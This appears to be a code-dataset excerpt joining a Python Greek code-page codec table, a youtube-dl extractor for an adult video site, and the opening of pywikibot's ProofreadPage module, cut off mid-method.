'\u03a5' # 0x0093 -> GREEK CAPITAL LETTER UPSILON
'\u03a6' # 0x0094 -> GREEK CAPITAL LETTER PHI
'\u03a7' # 0x0095 -> GREEK CAPITAL LETTER CHI
'\u03a8' # 0x0096 -> GREEK CAPITAL LETTER PSI
'\u03a9' # 0x0097 -> GREEK CAPITAL LETTER OMEGA
'\u03b1' # 0x0098 -> GREEK SMALL LETTER ALPHA
'\u03b2' # 0x0099 -> GREEK SMALL LETTER BETA
'\u03b3' # 0x009a -> GREEK SMALL LETTER GAMMA
'\u03b4' # 0x009b -> GREEK SMALL LETTER DELTA
'\u03b5' # 0x009c -> GREEK SMALL LETTER EPSILON
'\u03b6' # 0x009d -> GREEK SMALL LETTER ZETA
'\u03b7' # 0x009e -> GREEK SMALL LETTER ETA
'\u03b8' # 0x009f -> GREEK SMALL LETTER THETA
'\u03b9' # 0x00a0 -> GREEK SMALL LETTER IOTA
'\u03ba' # 0x00a1 -> GREEK SMALL LETTER KAPPA
'\u03bb' # 0x00a2 -> GREEK SMALL LETTER LAMDA
'\u03bc' # 0x00a3 -> GREEK SMALL LETTER MU
'\u03bd' # 0x00a4 -> GREEK SMALL LETTER NU
'\u03be' # 0x00a5 -> GREEK SMALL LETTER XI
'\u03bf' # 0x00a6 -> GREEK SMALL LETTER OMICRON
'\u03c0' # 0x00a7 -> GREEK SMALL LETTER PI
'\u03c1' # 0x00a8 -> GREEK SMALL LETTER RHO
'\u03c3' # 0x00a9 -> GREEK SMALL LETTER SIGMA
'\u03c2' # 0x00aa -> GREEK SMALL LETTER FINAL SIGMA
'\u03c4' # 0x00ab -> GREEK SMALL LETTER TAU
'\u03c5' # 0x00ac -> GREEK SMALL LETTER UPSILON
'\u03c6' # 0x00ad -> GREEK SMALL LETTER PHI
'\u03c7' # 0x00ae -> GREEK SMALL LETTER CHI
'\u03c8' # 0x00af -> GREEK SMALL LETTER PSI
'\u2591' # 0x00b0 -> LIGHT SHADE
'\u2592' # 0x00b1 -> MEDIUM SHADE
'\u2593' # 0x00b2 -> DARK SHADE
'\u2502' # 0x00b3 -> BOX DRAWINGS LIGHT VERTICAL
'\u2524' # 0x00b4 -> BOX DRAWINGS LIGHT VERTICAL AND LEFT
'\u2561' # 0x00b5 -> BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
'\u2562' # 0x00b6 -> BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
'\u2556' # 0x00b7 -> BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
'\u2555' # 0x00b8 -> BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
'\u2563' # 0x00b9 -> BOX DRAWINGS DOUBLE VERTICAL AND LEFT
'\u2551' # 0x00ba -> BOX DRAWINGS DOUBLE VERTICAL
'\u2557' # 0x00bb -> BOX DRAWINGS DOUBLE DOWN AND LEFT
'\u255d' # 0x00bc -> BOX DRAWINGS DOUBLE UP AND LEFT
'\u255c' # 0x00bd -> BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
'\u255b' # 0x00be -> BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
'\u2510' # 0x00bf -> BOX DRAWINGS LIGHT DOWN AND LEFT
'\u2514' # 0x00c0 -> BOX DRAWINGS LIGHT UP AND RIGHT
'\u2534' # 0x00c1 -> BOX DRAWINGS LIGHT UP AND HORIZONTAL
'\u252c' # 0x00c2 -> BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
'\u251c' # 0x00c3 -> BOX DRAWINGS LIGHT VERTICAL AND RIGHT
'\u2500' # 0x00c4 -> BOX DRAWINGS LIGHT HORIZONTAL
'\u253c' # 0x00c5 -> BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
'\u255e' # 0x00c6 -> BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
'\u255f' # 0x00c7 -> BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
'\u255a' # 0x00c8 -> BOX DRAWINGS DOUBLE UP AND RIGHT
'\u2554' # 0x00c9 -> BOX DRAWINGS DOUBLE DOWN AND RIGHT
'\u2569' # 0x00ca -> BOX DRAWINGS DOUBLE UP AND HORIZONTAL
'\u2566' # 0x00cb -> BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
'\u2560' # 0x00cc -> BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
'\u2550' # 0x00cd -> BOX DRAWINGS DOUBLE HORIZONTAL
'\u256c' # 0x00ce -> BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
'\u2567' # 0x00cf -> BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
'\u2568' # 0x00d0 -> BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
'\u2564' # 0x00d1 -> BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
'\u2565' # 0x00d2 -> BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
'\u2559' # 0x00d3 -> BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
'\u2558' # 0x00d4 -> BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
'\u2552' # 0x00d5 -> BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
'\u2553' # 0x00d6 -> BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
'\u256b' # 0x00d7 -> BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
'\u256a' # 0x00d8 -> BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
'\u2518' # 0x00d9 -> BOX DRAWINGS LIGHT UP AND LEFT
'\u250c' # 0x00da -> BOX DRAWINGS LIGHT DOWN AND RIGHT
'\u2588' # 0x00db -> FULL BLOCK
'\u2584' # 0x00dc -> LOWER HALF BLOCK
'\u258c' # 0x00dd -> LEFT HALF BLOCK
'\u2590' # 0x00de -> RIGHT HALF BLOCK
'\u2580' # 0x00df -> UPPER HALF BLOCK
'\u03c9' # 0x00e0 -> GREEK SMALL LETTER OMEGA
'\u03ac' # 0x00e1 -> GREEK SMALL LETTER ALPHA WITH TONOS
'\u03ad' # 0x00e2 -> GREEK SMALL LETTER EPSILON WITH TONOS
'\u03ae' # 0x00e3 -> GREEK SMALL LETTER ETA WITH TONOS
'\u03ca' # 0x00e4 -> GREEK SMALL LETTER IOTA WITH DIALYTIKA
'\u03af' # 0x00e5 -> GREEK SMALL LETTER IOTA WITH TONOS
'\u03cc' # 0x00e6 -> GREEK SMALL LETTER OMICRON WITH TONOS
'\u03cd' # 0x00e7 -> GREEK SMALL LETTER UPSILON WITH TONOS
'\u03cb' # 0x00e8 -> GREEK SMALL LETTER UPSILON WITH DIALYTIKA
'\u03ce' # 0x00e9 -> GREEK SMALL LETTER OMEGA WITH TONOS
'\u0386' # 0x00ea -> GREEK CAPITAL LETTER ALPHA WITH TONOS
'\u0388' # 0x00eb -> GREEK CAPITAL LETTER EPSILON WITH TONOS
'\u0389' # 0x00ec -> GREEK CAPITAL LETTER ETA WITH TONOS
'\u038a' # 0x00ed -> GREEK CAPITAL LETTER IOTA WITH TONOS
'\u038c' # 0x00ee -> GREEK CAPITAL LETTER OMICRON WITH TONOS
'\u038e' # 0x00ef -> GREEK CAPITAL LETTER UPSILON WITH TONOS
'\u038f' # 0x00f0 -> GREEK CAPITAL LETTER OMEGA WITH TONOS
'\xb1' # 0x00f1 -> PLUS-MINUS SIGN
'\u2265' # 0x00f2 -> GREATER-THAN OR EQUAL TO
'\u2264' # 0x00f3 -> LESS-THAN OR EQUAL TO
'\u03aa' # 0x00f4 -> GREEK CAPITAL LETTER IOTA WITH DIALYTIKA
'\u03ab' # 0x00f5 -> GREEK CAPITAL LETTER UPSILON WITH DIALYTIKA
'\xf7' # 0x00f6 -> DIVISION SIGN
'\u2248' # 0x00f7 -> ALMOST EQUAL TO
'\xb0' # 0x00f8 -> DEGREE SIGN
'\u2219' # 0x00f9 -> BULLET OPERATOR
'\xb7' # 0x00fa -> MIDDLE DOT
'\u221a' # 0x00fb -> SQUARE ROOT
'\u207f' # 0x00fc -> SUPERSCRIPT LATIN SMALL LETTER N
'\xb2' # 0x00fd -> SUPERSCRIPT TWO
'\u25a0' # 0x00fe -> BLACK SQUARE
'\xa0' # 0x00ff -> NO-BREAK SPACE
)
### Encoding Map
encoding_map = {
0x0000: 0x0000, # NULL
0x0001: 0x0001, # START OF HEADING
0x0002: 0x0002, # START OF TEXT
0x0003: 0x0003, # END OF TEXT
0x0004: 0x0004, # END OF TRANSMISSION
0x0005: 0x0005, # ENQUIRY
0x0006: 0x0006, # ACKNOWLEDGE
0x0007: 0x0007, # BELL
0x0008: 0x0008, # BACKSPACE
0x0009: 0x0009, # HORIZONTAL TABULATION
0x000a: 0x000a, # LINE FEED
0x000b: 0x000b, # VERTICAL TABULATION
0x000c: 0x000c, # FORM FEED
0x000d: 0x000d, # CARRIAGE RETURN
0x000e: 0x000e, # SHIFT OUT
0x000f: 0x000f, # SHIFT IN
0x0010: 0x0010, # DATA LINK ESCAPE
0x0011: 0x0011, # DEVICE CONTROL ONE
0x0012: 0x0012, # DEVICE CONTROL TWO
0x0013: 0x0013, # DEVICE CONTROL THREE
0x0014: 0x0014, # DEVICE CONTROL FOUR
0x0015: 0x0015, # NEGATIVE ACKNOWLEDGE
0x0016: 0x0016, # SYNCHRONOUS IDLE
0x0017: 0x0017, # END OF TRANSMISSION BLOCK
0x0018: 0x0018, # CANCEL
0x0019: 0x0019, # END OF MEDIUM
0x001a: 0x001a, # SUBSTITUTE
0x001b: 0x001b, # ESCAPE
0x001c: 0x001c, # FILE SEPARATOR
0x001d: 0x001d, # GROUP SEPARATOR
0x001e: 0x001e, # RECORD SEPARATOR
0x001f: 0x001f, # UNIT SEPARATOR
0x0020: 0x0020, # SPACE
0x0021: 0x0021, # EXCLAMATION MARK
0x0022: 0x0022, # QUOTATION MARK
0x0023: 0x0023, # NUMBER SIGN
0x0024: 0x0024, # DOLLAR SIGN
0x0025: 0x0025, # PERCENT SIGN
0x0026: 0x0026, # AMPERSAND
0x0027: 0x0027, # APOSTROPHE
0x0028: 0x0028, # LEFT PARENTHESIS
0x0029: 0x0029, # RIGHT PARENTHESIS
0x002a: 0x002a, # ASTERISK
0x002b: 0x002b, # PLUS SIGN
0x002c: 0x002c, # COMMA
0x002d: 0x002d, # HYPHEN-MINUS
0x002e: 0x002e, # FULL STOP
0x002f: 0x002f, # SOLIDUS
0x0030: 0x0030, # DIGIT ZERO
0x0031: 0x0031, # DIGIT ONE
0x0032: 0x0032, # DIGIT TWO
0x0033: 0x0033, # DIGIT THREE
0x0034: 0x0034, # DIGIT FOUR
0x0035: 0x0035, # DIGIT FIVE
0x0036: 0x0036, # DIGIT SIX
0x0037: 0x0037, # DIGIT SEVEN
0x0038: 0x0038, # DIGIT EIGHT
0x0039: 0x0039, # DIGIT NINE
0x003a: 0x003a, # COLON
0x003b: 0x003b, # SEMICOLON
0x003c: 0x003c, # LESS-THAN SIGN
0x003d: 0x003d, # EQUALS SIGN
0x003e: 0x003e, # GREATER-THAN SIGN
0x003f: 0x003f, # QUESTION MARK
0x0040: 0x0040, # COMMERCIAL AT
0x0041: 0x0041, # LATIN CAPITAL LETTER A
0x0042: 0x0042, # LATIN CAPITAL LETTER B
0x0043: 0x0043, # LATIN CAPITAL LETTER C
0x0044: 0x0044, # LATIN CAPITAL LETTER D
0x0045: 0x0045, # LATIN CAPITAL LETTER E
0x0046: 0x0046, # LATIN CAPITAL LETTER F
0x0047: 0x0047, # LATIN CAPITAL LETTER G
0x0048: 0x0048, # LATIN CAPITAL LETTER H
0x0049: 0x0049, # LATIN CAPITAL LETTER I
0x004a: 0x004a, # LATIN CAPITAL LETTER J
0x004b: 0x004b, # LATIN CAPITAL LETTER K
0x004c: 0x004c, # LATIN CAPITAL LETTER L
0x004d: 0x004d, # LATIN CAPITAL LETTER M
0x004e: 0x004e, # LATIN CAPITAL LETTER N
0x004f: 0x004f, # LATIN CAPITAL LETTER O
0x0050: 0x0050, # LATIN CAPITAL LETTER P
0x0051: 0x0051, # LATIN CAPITAL LETTER Q
0x0052: 0x0052, # LATIN CAPITAL LETTER R
0x0053: 0x0053, # LATIN CAPITAL LETTER S
0x0054: 0x0054, # LATIN CAPITAL LETTER T
0x0055: 0x0055, # LATIN CAPITAL LETTER U
0x0056: 0x0056, # LATIN CAPITAL LETTER V
0x0057: 0x0057, # LATIN CAPITAL LETTER W
0x0058: 0x0058, # LATIN CAPITAL LETTER X
0x0059: 0x0059, # LATIN CAPITAL LETTER Y
0x005a: 0x005a, # LATIN CAPITAL LETTER Z
0x005b: 0x005b, # LEFT SQUARE BRACKET
0x005c: 0x005c, # REVERSE SOLIDUS
0x005d: 0x005d, # RIGHT SQUARE BRACKET
0x005e: 0x005e, # CIRCUMFLEX ACCENT
0x005f: 0x005f, # LOW LINE
0x0060: 0x0060, # GRAVE ACCENT
0x0061: 0x0061, # LATIN SMALL LETTER A
0x0062: 0x0062, # LATIN SMALL LETTER B
0x0063: 0x0063, # LATIN SMALL LETTER C
0x0064: 0x0064, # LATIN SMALL LETTER D
0x0065: 0x0065, # LATIN SMALL LETTER E
0x0066: 0x0066, # LATIN SMALL LETTER F
0x0067: 0x0067, # LATIN SMALL LETTER G
0x0068: 0x0068, # LATIN SMALL LETTER H
0x0069: 0x0069, # LATIN SMALL LETTER I
0x006a: 0x006a, # LATIN SMALL LETTER J
0x006b: 0x006b, # LATIN SMALL LETTER K
0x006c: 0x006c, # LATIN SMALL LETTER L
0x006d: 0x006d, # LATIN SMALL LETTER M
0x006e: 0x006e, # LATIN SMALL LETTER N
0x006f: 0x006f, # LATIN SMALL LETTER O
0x0070: 0x0070, # LATIN SMALL LETTER P
0x0071: 0x0071, # LATIN SMALL LETTER Q
0x0072: 0x0072, # LATIN SMALL LETTER R
0x0073: 0x0073, # LATIN SMALL LETTER S
0x0074: 0x0074, # LATIN SMALL LETTER T
0x0075: 0x0075, # LATIN SMALL LETTER U
0x0076: 0x0076, # LATIN SMALL LETTER V
0x0077: 0x0077, # LATIN SMALL LETTER W
0x0078: 0x0078, # LATIN SMALL LETTER X
0x0079: 0x0079, # LATIN SMALL LETTER Y
0x007a: 0x007a, # LATIN SMALL LETTER Z
0x007b: 0x007b, # LEFT CURLY BRACKET
0x007c: 0x007c, # VERTICAL LINE
0x007d: 0x007d, # RIGHT CURLY BRACKET
0x007e: 0x007e, # TILDE
0x007f: 0x007f, # DELETE
0x00a0: 0x00ff, # NO-BREAK SPACE
0x00b0: 0x00f8, # DEGREE SIGN
0x00b1: 0x00f1, # PLUS-MINUS SIGN
0x00b2: 0x00fd, # SUPERSCRIPT TWO
0x00b7: 0x00fa, # MIDDLE DOT
0x00f7: 0x00f6, # DIVISION SIGN
0x0386: 0x00ea, # GREEK CAPITAL LETTER ALPHA WITH TONOS
0x0388: 0x00eb, # GREEK CAPITAL LETTER EPSILON WITH TONOS
0x0389: 0x00ec, # GREEK CAPITAL LETTER ETA WITH TONOS
0x038a: 0x00ed, # GREEK CAPITAL LETTER IOTA WITH TONOS
0x038c: 0x00ee, # GREEK CAPITAL LETTER OMICRON WITH TONOS
0x038e: 0x00ef, # GREEK CAPITAL LETTER UPSILON WITH TONOS
0x038f: 0x00f0, # GREEK CAPITAL LETTER OMEGA WITH TONOS
0x0391: 0x0080, # GREEK CAPITAL LETTER ALPHA
0x0392: 0x0081, # GREEK CAPITAL LETTER BETA
0x0393: 0x0082, # GREEK CAPITAL LETTER GAMMA
0x0394: 0x0083, # GREEK CAPITAL LETTER DELTA
0x0395: 0x0084, # GREEK CAPITAL LETTER EPSILON
0x0396: 0x0085, # GREEK CAPITAL LETTER ZETA
0x0397: 0x0086, # GREEK CAPITAL LETTER ETA
0x0398: 0x0087, # GREEK CAPITAL LETTER THETA
0x0399: 0x0088, # GREEK CAPITAL LETTER IOTA
0x039a: 0x0089, # GREEK CAPITAL LETTER KAPPA
0x039b: 0x008a, # GREEK CAPITAL LETTER LAMDA
0x039c: 0x008b, # GREEK CAPITAL LETTER MU
0x039d: 0x008c, # GREEK CAPITAL LETTER NU
0x039e: 0x008d, # GREEK CAPITAL LETTER XI
0x039f: 0x008e, # GREEK CAPITAL LETTER OMICRON
0x03a0: 0x008f, # GREEK CAPITAL LETTER PI
0x03a1: 0x0090, # GREEK CAPITAL LETTER RHO
0x03a3: 0x0091, # GREEK CAPITAL LETTER SIGMA
0x03a4: 0x0092, # GREEK CAPITAL LETTER TAU
0x03a5: 0x0093, # GREEK CAPITAL LETTER UPSILON
0x03a6: 0x0094, # GREEK CAPITAL LETTER PHI
0x03a7: 0x0095, # GREEK CAPITAL LETTER CHI
0x03a8: 0x0096, # GREEK CAPITAL LETTER PSI
0x03a9: 0x0097, # GREEK CAPITAL LETTER OMEGA
0x03aa: 0x00f4, # GREEK CAPITAL LETTER IOTA WITH DIALYTIKA
0x03ab: 0x00f5, # GREEK CAPITAL LETTER UPSILON WITH DIALYTIKA
0x03ac: 0x00e1, # GREEK SMALL LETTER ALPHA WITH TONOS
0x03ad: 0x00e2, # GREEK SMALL LETTER EPSILON WITH TONOS
0x03ae: 0x00e3, # GREEK SMALL LETTER ETA WITH TONOS
0x03af: 0x00e5, # GREEK SMALL LETTER IOTA WITH TONOS
0x03b1: 0x0098, # GREEK SMALL LETTER ALPHA
0x03b2: 0x0099, # GREEK SMALL LETTER BETA
0x03b3: 0x009a, # GREEK SMALL LETTER GAMMA
0x03b4: 0x009b, # GREEK SMALL LETTER DELTA
0x03b5: 0x009c, # GREEK SMALL LETTER EPSILON
0x03b6: 0x009d, # GREEK SMALL LETTER ZETA
0x03b7: 0x009e, # GREEK SMALL LETTER ETA
0x03b8: 0x009f, # GREEK SMALL LETTER THETA
0x03b9: 0x00a0, # GREEK SMALL LETTER IOTA
0x03ba: 0x00a1, # GREEK SMALL LETTER KAPPA
0x03bb: 0x00a2, # GREEK SMALL LETTER LAMDA
0x03bc: 0x00a3, # GREEK SMALL LETTER MU
0x03bd: 0x00a4, # GREEK SMALL LETTER NU
0x03be: 0x00a5, # GREEK SMALL LETTER XI
0x03bf: 0x00a6, # GREEK SMALL LETTER OMICRON
0x03c0: 0x00a7, # GREEK SMALL LETTER PI
0x03c1: 0x00a8, # GREEK SMALL LETTER RHO
0x03c2: 0x00aa, # GREEK SMALL LETTER FINAL SIGMA
0x03c3: 0x00a9, # GREEK SMALL LETTER SIGMA
0x03c4: 0x00ab, # GREEK SMALL LETTER TAU
0x03c5: 0x00ac, # GREEK SMALL LETTER UPSILON
0x03c6: 0x00ad, # GREEK SMALL LETTER PHI
0x03c7: 0x00ae, # GREEK SMALL LETTER CHI
0x03c8: 0x00af, # GREEK SMALL LETTER PSI
0x03c9: 0x00e0, # GREEK SMALL LETTER OMEGA
0x03ca: 0x00e4, # GREEK SMALL LETTER IOTA WITH DIALYTIKA
0x03cb: 0x00e8, # GREEK SMALL LETTER UPSILON WITH DIALYTIKA
0x03cc: 0x00e6, # GREEK SMALL LETTER OMICRON WITH TONOS
0x03cd: 0x00e7, # GREEK SMALL LETTER UPSILON WITH TONOS
0x03ce: 0x00e9, # GREEK SMALL LETTER OMEGA WITH TONOS
0x207f: 0x00fc, # SUPERSCRIPT LATIN SMALL LETTER N
0x2219: 0x00f9, # BULLET OPERATOR
0x221a: 0x00fb, # SQUARE ROOT
0x2248: 0x00f7, # ALMOST EQUAL TO
0x2264: 0x00f3, # LESS-THAN OR EQUAL TO
0x2265: 0x00f2, # GREATER-THAN OR EQUAL TO
0x2500: 0x00c4, # BOX DRAWINGS LIGHT HORIZONTAL
0x2502: 0x00b3, # BOX DRAWINGS LIGHT VERTICAL
0x250c: 0x00da, # BOX DRAWINGS LIGHT DOWN AND RIGHT
0x2510: 0x00bf, # BOX DRAWINGS LIGHT DOWN AND LEFT
0x2514: 0x00c0, # BOX DRAWINGS LIGHT UP AND RIGHT
0x2518: 0x00d9, # BOX DRAWINGS LIGHT UP AND LEFT
0x251c: 0x00c3, # BOX DRAWINGS LIGHT VERTICAL AND RIGHT
0x2524: 0x00b4, # BOX DRAWINGS LIGHT VERTICAL AND LEFT
0x252c: 0x00c2, # BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
0x2534: 0x00c1, # BOX DRAWINGS LIGHT UP AND HORIZONTAL
0x253c: 0x00c5, # BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
0x2550: 0x00cd, # BOX DRAWINGS DOUBLE HORIZONTAL
0x2551: 0x00ba, # BOX DRAWINGS DOUBLE VERTICAL
0x2552: 0x00d5, # BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
0x2553: 0x00d6, # BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
0x2554: 0x00c9, # BOX DRAWINGS DOUBLE DOWN AND RIGHT
0x2555: 0x00b8, # BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
0x2556: 0x00b7, # BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
0x2557: 0x00bb, # BOX DRAWINGS DOUBLE DOWN AND LEFT
0x2558: 0x00d4, # BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
0x2559: 0x00d3, # BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
0x255a: 0x00c8, # BOX DRAWINGS DOUBLE UP AND RIGHT
0x255b: 0x00be, # BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
0x255c: 0x00bd, # BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
0x255d: 0x00bc, # BOX DRAWINGS DOUBLE UP AND LEFT
0x255e: 0x00c6, # BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
0x255f: 0x00c7, # BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
0x2560: 0x00cc, # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
0x2561: 0x00b5, # BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
0x2562: 0x00b6, # BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
0x2563: 0x00b9, # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
0x2564: 0x00d1, # BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
0x2565: 0x00d2, # BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
0x2566: 0x00cb, # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
0x2567: 0x00cf, # BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
0x2568: 0x00d0, # BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
0x2569: 0x00ca, # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
0x256a: 0x00d8, # BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
0x256b: 0x00d7, # BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
0x256c: 0x00ce, # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
0x2580: 0x00df, # UPPER HALF BLOCK
0x2584: 0x00dc, # LOWER HALF BLOCK
0x2588: 0x00db, # FULL BLOCK
0x258c: 0x00dd, # LEFT HALF BLOCK
0x2590: 0x00de, # RIGHT HALF BLOCK
0x2591: 0x00b0, # LIGHT SHADE
0x2592: 0x00b1, # MEDIUM SHADE
0x2593: 0x00b2, # DARK SHADE
0x25a0: 0x00fe, # BLACK SQUARE
}
| mit |
paukenba/youtube-dl | youtube_dl/extractor/xbef.py | 105 | 1444 | from __future__ import unicode_literals
from .common import InfoExtractor
from ..compat import compat_urllib_parse_unquote
class XBefIE(InfoExtractor):
_VALID_URL = r'http://(?:www\.)?xbef\.com/video/(?P<id>[0-9]+)'
_TEST = {
'url': 'http://xbef.com/video/5119-glamourous-lesbians-smoking-drinking-and-fucking',
'md5': 'a478b565baff61634a98f5e5338be995',
'info_dict': {
'id': '5119',
'ext': 'mp4',
'title': 'md5:7358a9faef8b7b57acda7c04816f170e',
'age_limit': 18,
'thumbnail': 're:^http://.*\.jpg',
}
}
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
title = self._html_search_regex(
r'<h1[^>]*>(.*?)</h1>', webpage, 'title')
config_url_enc = self._download_webpage(
'http://xbef.com/Main/GetVideoURLEncoded/%s' % video_id, video_id,
note='Retrieving config URL')
config_url = compat_urllib_parse_unquote(config_url_enc)
config = self._download_xml(
config_url, video_id, note='Retrieving config')
video_url = config.find('./file').text
thumbnail = config.find('./image').text
return {
'id': video_id,
'url': video_url,
'title': title,
'thumbnail': thumbnail,
'age_limit': 18,
}
| unlicense |
npdoty/pywikibot | pywikibot/proofreadpage.py | 3 | 33142 | # -*- coding: utf-8 -*-
"""
Objects used with ProofreadPage Extension.
The extension is supported by MW 1.21+.
This module includes objects:
* ProofreadPage(Page)
* FullHeader
* IndexPage(Page)
OCR support of page scans via:
- https://tools.wmflabs.org/phetools/hocr_cgi.py
- https://tools.wmflabs.org/phetools/ocr.php
inspired by https://en.wikisource.org/wiki/MediaWiki:Gadget-ocr.js
"""
#
# (C) Pywikibot team, 2015-2017
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, unicode_literals
__version__ = '$Id$'
from functools import partial
import json
import re
try:
from bs4 import BeautifulSoup, FeatureNotFound
except ImportError as e:
BeautifulSoup = e
else:
try:
BeautifulSoup('', 'lxml')
except FeatureNotFound:
Soup = partial(BeautifulSoup, features='html.parser')
else:
Soup = partial(BeautifulSoup, features='lxml')
import pywikibot
from pywikibot.comms import http
from pywikibot.data.api import Request
_logger = 'proofreadpage'
class FullHeader(object):
"""Header of a ProofreadPage object."""
p_header = re.compile(
r'<pagequality level="(?P<ql>\d)" user="(?P<user>.*?)" />'
r'(?P<has_div><div class="pagetext">)?(?P<header>.*)',
re.DOTALL)
TEMPLATE_V1 = ('<pagequality level="{0.ql}" user="{0.user}" />'
'<div class="pagetext">{0.header}\n\n\n')
TEMPLATE_V2 = ('<pagequality level="{0.ql}" user="{0.user}" />'
'{0.header}')
def __init__(self, text=None):
"""Constructor."""
self._text = text or ''
self._has_div = True
m = self.p_header.search(self._text)
if m:
self.ql = int(m.group('ql'))
self.user = m.group('user')
self.header = m.group('header')
if not m.group('has_div'):
self._has_div = False
else:
self.ql = ProofreadPage.NOT_PROOFREAD
self.user = ''
self.header = ''
def __str__(self):
"""Return a string representation."""
if self._has_div:
return FullHeader.TEMPLATE_V1.format(self)
else:
return FullHeader.TEMPLATE_V2.format(self)
class ProofreadPage(pywikibot.Page):
"""ProofreadPage page used in Mediawiki ProofreadPage extension."""
WITHOUT_TEXT = 0
NOT_PROOFREAD = 1
PROBLEMATIC = 2
PROOFREAD = 3
VALIDATED = 4
PROOFREAD_LEVELS = [WITHOUT_TEXT,
NOT_PROOFREAD,
PROBLEMATIC,
PROOFREAD,
VALIDATED,
]
_FMT = ('{0.open_tag}{0._full_header}{0.close_tag}'
'{0._body}'
'{0.open_tag}{0._footer}%s{0.close_tag}')
open_tag = '<noinclude>'
close_tag = '</noinclude>'
p_open = re.compile(r'<noinclude>')
p_close = re.compile(r'(</div>|\n\n\n)?</noinclude>')
# phe-tools ocr utility
HOCR_CMD = ('https://tools.wmflabs.org/phetools/hocr_cgi.py?'
'cmd=hocr&book={book}&lang={lang}&user={user}')
OCR_CMD = ('https://tools.wmflabs.org/phetools/ocr.php?'
'cmd=ocr&url={url_image}&lang={lang}&user={user}')
MULTI_PAGE_EXT = ['djvu', 'pdf']
def __init__(self, source, title=''):
"""Instantiate a ProofreadPage object.
@raise UnknownExtension: source Site has no ProofreadPage Extension.
"""
if not isinstance(source, pywikibot.site.BaseSite):
site = source.site
else:
site = source
super(ProofreadPage, self).__init__(source, title)
if self.namespace() != site.proofread_page_ns:
raise ValueError('Page %s must belong to %s namespace'
% (self.title(), site.proofread_page_ns))
# Ensure that constants are in line with Extension values.
if list(self.site.proofread_levels.keys()) != self.PROOFREAD_LEVELS:
raise ValueError('QLs do not match site values: %s != %s'
% (self.site.proofread_levels.keys(),
self.PROOFREAD_LEVELS))
self._base, self._base_ext, self._num = self._parse_title()
self._multi_page = self._base_ext in self.MULTI_PAGE_EXT
@property
def _fmt(self):
if self._full_header._has_div:
return self._FMT % '</div>'
else:
return self._FMT % ''
def _parse_title(self):
"""Get ProofreadPage base title, base extension and page number.
Base title is the part of title before the last '/', if any,
or the whole title if no '/' is present.
Extension is the extension of the base title.
Page number is the part of title after the last '/', if any,
or None if no '/' is present.
E.g. for title 'Page:Popular Science Monthly Volume 1.djvu/12':
- base = 'Popular Science Monthly Volume 1.djvu'
- extenstion = 'djvu'
- number = 12
E.g. for title 'Page:Original Waltzing Matilda manuscript.jpg':
- base = 'Original Waltzing Matilda manuscript.jpg'
- extenstion = 'jpg'
- number = None
@return: (base, ext, num).
@rtype: tuple
"""
left, sep, right = self.title(withNamespace=False).rpartition('/')
if sep:
base = left
num = int(right)
else:
base = right
num = None
left, sep, right = base.rpartition('.')
if sep:
ext = right
else:
ext = ''
return (base, ext, num)
@property
def index(self):
"""Get the Index page which contains ProofreadPage.
If there are many Index pages link to this ProofreadPage, and
the ProofreadPage is titled Page:<index title>/<page number>,
the Index page with the same title will be returned.
Otherwise None is returned in the case of multiple linked Index pages.
To force reload, delete index and call it again.
@return: the Index page for this ProofreadPage
@rtype: IndexPage or None
"""
if not hasattr(self, '_index'):
index_ns = self.site.proofread_index_ns
what_links_here = [IndexPage(page) for page in
set(self.getReferences(namespaces=index_ns))]
if not what_links_here:
self._index = (None, [])
elif len(what_links_here) == 1:
self._index = (what_links_here.pop(), [])
else:
self._index = (None, what_links_here)
# Try to infer names from page titles.
if self._num is not None:
for page in what_links_here:
if page.title(withNamespace=False) == self._base:
